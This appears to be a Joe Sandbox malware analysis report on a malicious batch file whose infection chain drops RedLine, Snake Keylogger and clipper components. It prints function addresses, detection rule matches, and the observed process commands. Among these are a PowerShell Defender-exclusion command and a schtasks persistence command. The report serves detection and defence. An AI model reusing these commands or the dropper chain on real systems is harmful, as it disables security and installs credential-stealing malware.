Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DCD9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DC79B2 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C485DC CreateProcessAsUserW
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C320C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 10_1_004073A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_00BBC530
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_00BB2DD1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_00BB9480
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_00BBC521
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_00BB946F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C91A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C8030
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C60D8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C7390
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C6D48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C79E0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C3598
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C3588
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C15F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C15E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C2438
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C2427
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C0498
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C0488
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C869F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C86B0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C46F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C46E9
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C3132
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C3140
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C1190
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C9190
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C11A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C51D8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C51E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C0006
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C8024
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C0040
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C60C9
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C7380
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C4290
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C42A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C0D39
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C6D37
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C0D48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C2CD8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C2CE8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C3E38
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C3E48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C1E9A
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C1EA8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C79D0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C39F0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C39E1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C2890
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C2880
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C08F0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C08E1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C4B50
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C4B40
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C1A50
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 13_2_051C1A40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_007EB490
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 21_2_02B920C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_31D71030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_31D71020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_351847B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 24_2_351847A8
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DB20C4
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 25_2_02DBD59B
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_24E31020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_24E31030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_253F47B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_2_253F47A8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 29_1_00418CCC
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00406CA029_1_00406CA0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004028B029_1_004028B0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0041A4BE29_1_0041A4BE
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0041824429_1_00418244
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0040165029_1_00401650
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00402F2029_1_00402F20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004193C429_1_004193C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0041878829_1_00418788
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00402F8929_1_00402F89
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00402B9029_1_00402B90
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004073A029_1_004073A0
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841B9430_2_05841B94
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584DAAC30_2_0584DAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584E5AF30_2_0584E5AF
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_058425A830_2_058425A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_058425B830_2_058425B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584E60830_2_0584E608
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_0584417A30_2_0584417A
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841D2030_2_05841D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841B8830_2_05841B88
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_05841BE830_2_05841BE8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 30_2_058B336030_2_058B3360
                      Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\rpkhzpuO.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02C3480C appears 931 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02C344AC appears 73 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02C346A4 appears 244 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02C344D0 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02C487A0 appears 54 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02C48824 appears 45 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Code function: String function: 02B946A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Code function: String function: 02DB46A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Code function: String function: 02DB480C appears 619 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Code function: String function: 02DC87A0 appears 48 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Code function: String function: 02B9480C appears 619 times
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Code function: String function: 02BA87A0 appears 48 times
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Code function: String function: 0040FB9C appears 40 times
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Code function: String function: 0040D606 appears 96 times
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Code function: String function: 0040E1D8 appears 176 times
                      Source: 10.1.rpkhzpuO.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 24.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 24.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.1.rpkhzpuO.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 29.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000001D.00000001.2760141830.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@42/20@3/3
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_02C37F5A GetDiskFreeSpaceA
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Code function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_02C46D50 CoCreateInstance
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Code function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9
                      Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\OupzhkprF.cmd
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
                      Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Local\Temp\x
                      Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" "
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Command line argument: 08A 10_1_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Command line argument: 08A 24_2_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Command line argument: 08A 29_2_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Command line argument: 08A 29_2_00413780
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Command line argument: 08A 29_1_00413780
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.000000000271E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.000000000275D000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4649310348.000000000366D000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.000000000272E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PO#3_RKG367.bat ReversingLabs: Detection: 23%
                      Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" "
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
